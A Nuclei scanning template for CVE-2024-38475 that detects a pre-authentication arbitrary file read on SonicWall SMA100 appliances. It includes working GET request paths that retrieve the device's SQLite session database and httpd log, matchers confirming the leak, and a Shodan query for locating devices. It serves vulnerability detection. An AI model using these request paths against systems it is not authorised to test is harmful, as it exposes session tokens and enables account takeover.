id: CVE-2024-38475
info:
  name: Sonicwall - Pre-Authentication Arbitrary File Read
  author: shaikhyaser
  severity: critical
  description: |
    Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use backreferences or variables as the first segment of the substitution are affected. Some unsafe RewriteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.
  impact: |
    Unauthenticated attackers can read arbitrary files from the SonicWall SMA100 filesystem including configuration files, logs, and sensitive data, potentially leading to further exploitation or complete system compromise.
  remediation: |
    Upgrade to the latest patched version of SonicWall SMA100 or apply vendor-provided security updates.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-SonicWall-PreAuth-RCE-Chain/blob/main/watchTowr-vs-SonicWall-PreAuth-RCE-Chain.py
    - https://labs.watchtowr.com/sonicboom-from-stolen-tokens-to-remote-shells-sonicwall-sma100-cve-2023-44221-cve-2024-38475/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-38475
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-38475
    cwe-id: CWE-116
    epss-score: 0.99957
    epss-percentile: 0.99974
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SonicWall" html:"SMA"
  tags: cve,cve2024,sonicwal,sma-100,lfi,kev,vkev,vuln
http:
  - method: GET
    path:
      - "{{BaseURL}}/tmp/temp.db%3f.1.1.1.1a-1.css"
      - "{{BaseURL}}/mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css"
    matchers-condition: or
    matchers:
      # First path: the response body is a SQLite file containing a sessionId field
      - type: dsl
        dsl:
          - 'contains_all(body, "SQLite format","sessionId")'
          - 'status_code == 200'
        condition: and
      # Second path: the response is a plain-text httpd log
      - type: dsl
        dsl:
          - 'contains_all(body, "mod_antiloris","[pid")'
          - 'contains(content_type, "text/plain")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100886070a9c55dbc5c728503d06e8ed07a96d370ef9f4193b21189fd107caac8e80220184199148af02ae61534b322cce4a3cdfc63117149e5441fcb104476674a72fe:922c64590222798bb761d5b6d8e72950